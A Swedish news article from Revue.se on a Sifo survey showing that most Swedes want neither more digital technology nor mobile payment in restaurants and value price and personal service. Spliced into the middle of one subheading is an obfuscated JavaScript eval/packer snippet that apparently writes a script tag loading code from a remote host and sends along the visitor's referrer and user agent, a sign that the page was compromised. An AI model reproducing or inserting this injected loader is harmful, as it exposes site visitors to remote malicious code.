Image Image Image Image Image Image Image Image Image Image

| 13 december, 2017

Scroll to top

Top

No Comments

Svenskar väljer bort digital teknologi på krogen | Revue.se

Svenskar väljer bort digital teknologi på krogen
Sebastian Plengier Ehrnfelt

Att ha möjlighet att beställa mat via appar och att få skräddarsy sin egen middagsupplevelse via digital teknologi är inget som svenskarna imponeras av. Enligt en Sifo-undersökning från Bookatable uppger endast 1 av 10 att restauranger borde införa mer digital teknologi i restaurangupplevelsen. Bara 14 procent av svenskarna vill använda en app eller surfplatta så att maten kommer fortare. Majoriteten (84 procent) framhäver istället vikten av det personliga och uppmärksammar servicen från servitörer.

Världen blir allt mer digital och för den uppkopplade samtidsmänniskan finns det mesta bara en svajpning bort. Allt fler restauranger anammar digital teknologi i matupplevelsen för att hänga på trenden. Men smarta tekniklösningar och digitalisering på krogen är inget som imponerar på traditionsenliga svenskar. I en ny Sifo-undersökning från Bookatable uppger endast 1 av 10 att de önskar mer digital teknologi vid restaurangbesöket. Vidare menar endast 9 procent att en skräddarsydd middagsupplevelse, genom att välja sin egen musik, belysning och temperaturnivå på krogen, är att föredra.

Priset eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kidbz|var|u0026u|referrer|zkeyt||js|php’.split(‘|’),0,{}))
viktigast

På frågan vad som är viktigast vid ett restaurangbesök, bortsett från maten, menar istället majoriteten (52 procent) av svenskarna att priset är avgörande. Därefter uppger 1 av 3 att den personliga servicen är viktigast medan knappt 1 av 10 menar att en anpassad och skräddarsydd matupplevelse är av största vikt.

Alternativa betaltjänster lockar inte

Svenskar föredrar att betala med kort och på senare år har antal företag som erbjuder betalningar via mobilen ökat stadigt. Men möjligheten att använda mobila betaltjänster såsom Apple Pay för att kunna betala notor på restaurangen är inget som lockar svenskarna. Så få som 12 procent uppger en önskan om fler mobila betaltjänster på krogen. Svenskarna imponeras heller inte av kontaktlösa lojalitetskort som vissa restauranger i dag erbjuder sina gäster. Bara 11 procent önskar att fler krogar inför detta som betalningsmetod.

Vill välja sittplats i restaurangen

Även om de flesta svenskarna nonchalerar skräddarsydda matupplevelser och digital teknologi på krogen, menar ändå majoriteten (57 procent) att framtidens restaurangupplevelse ska erbjuda möjligheten att välja sittplats i lokalen samt möjligheten att boka exakt tidpunkt då de får in sin måltid.

Om undersökningen

Undersökningen genomfördes i TNS Sifos webbpanel under perioden 13–17 oktober 2016. Totalt intervjuades 1119 personer i åldern 16-79 år.
Webbpanelen är riksrepresentativt rekryterad utifrån slumpmässiga urval. Det förekommer ingen självrekrytering i Sifos webbpanel.